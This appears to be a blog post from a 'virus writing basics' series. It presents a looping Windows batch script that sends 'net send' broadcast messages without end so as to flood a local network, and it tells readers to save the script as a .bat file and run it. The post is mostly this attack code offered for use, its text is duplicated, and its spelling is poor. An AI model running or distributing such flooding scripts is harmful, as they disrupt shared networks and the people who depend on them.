Virus code 17: Flood your network This is the virus writing basics section. Today we are going to show you on flodding the network. This is demonstra
Virus code 17: Flood your network
This is the virus writing basics section. Today we are going to show you on flodding the network. This is demonstrated using Dos/Batch programming.
The below cade will temporarily flood network once the user turns off his comp everything will be back to normal.
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
Just copy the code into a notepad file and save it as anything.bat. When you run it will start flodding your network.
This is the virus writing basics section. Today we are going to show you on flodding the network. This is demonstrated using Dos/Batch programming.
The below cade will temporarily flood network once the user turns off his comp everything will be back to normal.
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
Just copy the code into a notepad file and save it as anything.bat. When you run it will start flodding your network.
0 comments:
Post a Comment